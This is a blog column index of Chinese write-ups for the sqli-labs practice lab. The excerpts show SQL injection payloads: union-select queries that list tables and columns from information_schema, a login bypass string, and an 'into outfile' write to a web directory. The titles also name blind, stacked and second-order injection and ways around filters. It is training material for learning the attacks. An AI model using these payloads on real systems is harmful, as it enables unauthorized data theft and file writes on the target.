sqli-labs
文章平均质量分 72
sqlilabs wp
(∪.∪ )...zzz
这个作者很懒,什么都没留下…
展开
-
sqlilabs——Pages4
这里写自定义目录标题54爆表名爆列爆内容55 逐步爆 (54爆表名?id=-1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='challenges'--+爆列?id=-1' union select 1,2,group_concat(column_name) from information_schema.columns where table_nam原创 2021-12-14 10:46:58 · 879 阅读 · 0 评论 -
sqlilabs——Pages3
TOC堆叠注入38 堆叠注入 `'`39 堆叠注入 无闭合40 堆叠注入 `')`41 堆叠注入 盲注42 堆叠注入 报错型 POST43 堆叠注入 报错型 POST `')`44 堆叠注入 报错型 POST 盲注 `')`45 堆叠注入 报错型 POST 盲注 `')`Order by46 order by 报错型47 order by 报错型 `'`48 order by 不能报错回显49 order by 不能报错回显 `'`50 堆叠+order by 报错型51 堆叠+order by 报错型原创 2021-12-13 22:34:21 · 584 阅读 · 0 评论 -
sqlilabs——Pages2
tag21 cookie注入 base64源码解读22 Cookie注入 报错型 双引号 base64编码23 基于错误的,过滤注释的GET型24 二次注入25 过滤or and源码解读25a 过滤or and 盲注26 过滤空格注释 报错型源码分析26a 过滤空格注释 盲注27 过滤union select27a 过滤空格 注释 union select 盲注28 过滤union select 双引号闭合28a 过滤空格 注释 union select ') 盲注29 参数污染3031宽字节注入原创 2021-12-11 23:24:20 · 368 阅读 · 0 评论 -
Pages1--lesson17- POST 增删改函数
菜狗快学函数增加Insert删除delete修改update17 POST更新密码注入1. 检查函数中对username的各种转义处理,不能用username注入addslashes()stripslashes()mysql_real_escape_string()2. 对密码是否有注入3. 格式报错18 POST User agent注入19 POST-Referer20 POST-Cookie函数增加Insertinsert into users values('16','lcamry','lca原创 2021-07-05 23:00:11 · 268 阅读 · 0 评论 -
Pages1--lesson11-16 POST
考完啦-开始吧POST型11 POST型 单引号 字符型注入试一下admin' 报错查看源码admin'or'1'='1#admin'union select 1,database()#12 POST 双引号 字符型13 POST 单引号 变形14 POSTPOST型表单形式提交服务器进行验证11 POST型 单引号 字符型注入试一下admin’ 报错查看源码下面这个是12的源码 ,方便对比admin’or’1’='1#admin’union select 1,databas原创 2021-07-04 01:01:08 · 241 阅读 · 0 评论 -
sqlilabs--Pages1--lesson7-10 导入导出、盲注、报错注入
看我导入导出导入导出注入天书P29?id=1’)) union select 1,2,3 into outfile “D:\phpstudy\phpstudypro\WWW\sqlilabs\Less-7\1.txt”–+上图中显示 sql 出错了,但是没有关系,我们可以在文件中看到 uuu.txt 已经“D:\phpstudy\phpstudypro\WWW\sqlilabs\Less-7\1.txt”?id=0’)) union select 1,2,3 into outfile “D:\p原创 2021-06-17 01:34:13 · 125 阅读 · 0 评论 -
sqlilabs--Pages1--lesson5-6 盲注
看我盲注????less5-单引号1.left(database(),1)查看版本号第一位2.substr() ascii()3. regexp获取users表中的列4.ord() mid()获取users表的内容5.报错注入floorexpextractvalueupdatexml6. 延时注入less6-双引号盲注????运行正确只会返回you are in…不会返回数据库信息通过报错得到数据库信息less5-单引号1.left(database(),1)查看版本号第一位?id=1’and原创 2021-06-17 00:29:39 · 147 阅读 · 0 评论